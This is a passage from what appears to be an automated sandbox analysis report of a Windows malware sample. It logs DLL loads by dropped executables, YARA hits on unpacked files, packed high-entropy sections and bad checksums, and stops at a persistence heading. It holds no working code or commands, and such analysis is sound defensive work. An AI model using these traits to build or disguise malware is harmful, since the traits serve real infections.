Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Section loaded: apphelp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: api-ms-win-core-fibers-l1-1-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: api-ms-win-core-localization-l1-2-1.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: dxgidebug.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\22.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\takeown.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\takeown.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SUAosT64HD.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SUAosT64HD.exe Static file information: File size 2966016 > 1048576
Source: SUAosT64HD.exe Static PE information: Raw size of hsmahktm is bigger than: 0x100000 < 0x2a2800
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000000E.00000003.1923045915.00000000068E1000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000003.1922478872.00000000060EE000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000002.1929624688.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe, 0000000E.00000000.1920430499.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe.11.dr, apple[1].exe.11.dr, 39pazbF[1].exe.11.dr
Source: Binary string: C:\Users\1231123\Desktop\DDriver\x64\Release\DDriver.pdb source: ssisd.sys.14.dr

Data Obfuscation

Source: C:\Users\user\Desktop\SUAosT64HD.exe Unpacked PE file: 1.2.SUAosT64HD.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Unpacked PE file: 4.2.3d9778a1ff.exe.720000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 7.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 8.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 10.2.axplong.exe.680000.0.unpack :EW;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hsmahktm:EW;vyraapnb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Unpacked PE file: 11.2.rapes.exe.2d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ldnixbmt:EW;ltyxvgaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 16.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 19.2.22.exe.400000.0.unpack
Source: Yara match File source: 16.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.3.apple.exe.5b0bf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.22.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\22.exe, type: DROPPED
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5528031
Source: rapes.exe.4.dr Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: 39pazbF.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x3e1dd5
Source: xZRvIQ5.exe.11.dr Static PE information: real checksum: 0x0 should be: 0xb1cec
Source: apple.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x52234
Source: axplong.exe.1.dr Static PE information: real checksum: 0x2dcb84 should be: 0x2dd5bc
Source: Rm3cVPI[1].exe.11.dr Static PE information: real checksum: 0x0 should be: 0x64e65
Source: xZRvIQ5[1].exe.11.dr Static PE information: real checksum: 0x0 should be: 0xb1cec
Source: Rm3cVPI.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x64e65
Source: 22.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x1e9f1
Source: Or1ARiR[1].exe.11.dr Static PE information: real checksum: 0x1e0154 should be: 0x1df774
Source: 39pazbF[1].exe.11.dr Static PE information: real checksum: 0x0 should be: 0x3e1dd5
Source: Or1ARiR.exe.11.dr Static PE information: real checksum: 0x1e0154 should be: 0x1df774
Source: SUAosT64HD.exe Static PE information: real checksum: 0x2dcb84 should be: 0x2dd5bc
Source: 3d9778a1ff.exe.2.dr Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: random[1].exe.2.dr Static PE information: real checksum: 0x1df9c6 should be: 0x1e75e1
Source: apple[1].exe.11.dr Static PE information: real checksum: 0x0 should be: 0x52234
Source: SUAosT64HD.exe Static PE information: section name:
Source: SUAosT64HD.exe Static PE information: section name: .idata
Source: SUAosT64HD.exe Static PE information: section name: hsmahktm
Source: SUAosT64HD.exe Static PE information: section name: vyraapnb
Source: SUAosT64HD.exe Static PE information: section name: .taggant
Source: axplong.exe.1.dr Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name: .idata
Source: axplong.exe.1.dr Static PE information: section name: hsmahktm
Source: axplong.exe.1.dr Static PE information: section name: vyraapnb
Source: axplong.exe.1.dr Static PE information: section name: .taggant
Source: random[1].exe.2.dr Static PE information: section name:
Source: random[1].exe.2.dr Static PE information: section name: .idata
Source: random[1].exe.2.dr Static PE information: section name:
Source: random[1].exe.2.dr Static PE information: section name: ldnixbmt
Source: random[1].exe.2.dr Static PE information: section name: ltyxvgaa
Source: random[1].exe.2.dr Static PE information: section name: .taggant
Source: 3d9778a1ff.exe.2.dr Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr Static PE information: section name: .idata
Source: 3d9778a1ff.exe.2.dr Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr Static PE information: section name: ldnixbmt
Source: 3d9778a1ff.exe.2.dr Static PE information: section name: ltyxvgaa
Source: 3d9778a1ff.exe.2.dr Static PE information: section name: .taggant
Source: rapes.exe.4.dr Static PE information: section name:
Source: rapes.exe.4.dr Static PE information: section name: .idata
Source: rapes.exe.4.dr Static PE information: section name:
Source: rapes.exe.4.dr Static PE information: section name: ldnixbmt
Source: rapes.exe.4.dr Static PE information: section name: ltyxvgaa
Source: rapes.exe.4.dr Static PE information: section name: .taggant
Source: 39pazbF[1].exe.11.dr Static PE information: section name: .didat
Source: 39pazbF.exe.11.dr Static PE information: section name: .didat
Source: Or1ARiR[1].exe.11.dr Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: .rsrc
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: .idata
Source: Or1ARiR[1].exe.11.dr Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: iphnbyse
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: sbgczugd
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: .taggant
Source: Or1ARiR.exe.11.dr Static PE information: section name:
Source: Or1ARiR.exe.11.dr Static PE information: section name: .rsrc
Source: Or1ARiR.exe.11.dr Static PE information: section name: .idata
Source: Or1ARiR.exe.11.dr Static PE information: section name:
Source: Or1ARiR.exe.11.dr Static PE information: section name: iphnbyse
Source: Or1ARiR.exe.11.dr Static PE information: section name: sbgczugd
Source: Or1ARiR.exe.11.dr Static PE information: section name: .taggant
Source: xZRvIQ5[1].exe.11.dr Static PE information: section name: .gxfg
Source: xZRvIQ5[1].exe.11.dr Static PE information: section name: .retplne
Source: xZRvIQ5[1].exe.11.dr Static PE information: section name: _RDATA
Source: xZRvIQ5[1].exe.11.dr Static PE information: section name: .cSs
Source: apple[1].exe.11.dr Static PE information: section name: .didat
Source: apple.exe.11.dr Static PE information: section name: .didat
Source: xZRvIQ5.exe.11.dr Static PE information: section name: .gxfg
Source: xZRvIQ5.exe.11.dr Static PE information: section name: .retplne
Source: xZRvIQ5.exe.11.dr Static PE information: section name: _RDATA
Source: xZRvIQ5.exe.11.dr Static PE information: section name: .cSs
Source: 22.exe.14.dr Static PE information: section name: .code
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004BD84C push ecx; ret 1_2_004BD85F
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004B122F pushad ; ret 1_2_004B1230
Source: C:\Users\user\Desktop\SUAosT64HD.exe Code function: 1_2_004B0B3B push esp; retf 0000h 1_2_004B0B3C
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_0069D84C push ecx; ret 2_2_0069D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 2_2_0069DEF6 push ecx; ret 2_2_0069DF09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 3_2_0069D84C push ecx; ret 3_2_0069D85F
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 10_2_0069D84C push ecx; ret 10_2_0069D85F
Source: SUAosT64HD.exe Static PE information: section name: entropy: 7.985136812848815
Source: axplong.exe.1.dr Static PE information: section name: entropy: 7.985136812848815
Source: random[1].exe.2.dr Static PE information: section name: entropy: 7.975444772690215
Source: random[1].exe.2.dr Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: 3d9778a1ff.exe.2.dr Static PE information: section name: entropy: 7.975444772690215
Source: 3d9778a1ff.exe.2.dr Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: rapes.exe.4.dr Static PE information: section name: entropy: 7.975444772690215
Source: rapes.exe.4.dr Static PE information: section name: ldnixbmt entropy: 7.954880826054424
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: entropy: 7.975318503956283
Source: Or1ARiR[1].exe.11.dr Static PE information: section name: iphnbyse entropy: 7.953999153405441
Source: Or1ARiR.exe.11.dr Static PE information: section name: entropy: 7.975318503956283
Source: Or1ARiR.exe.11.dr Static PE information: section name: iphnbyse entropy: 7.953999153405441

Persistence and Installation Behavior

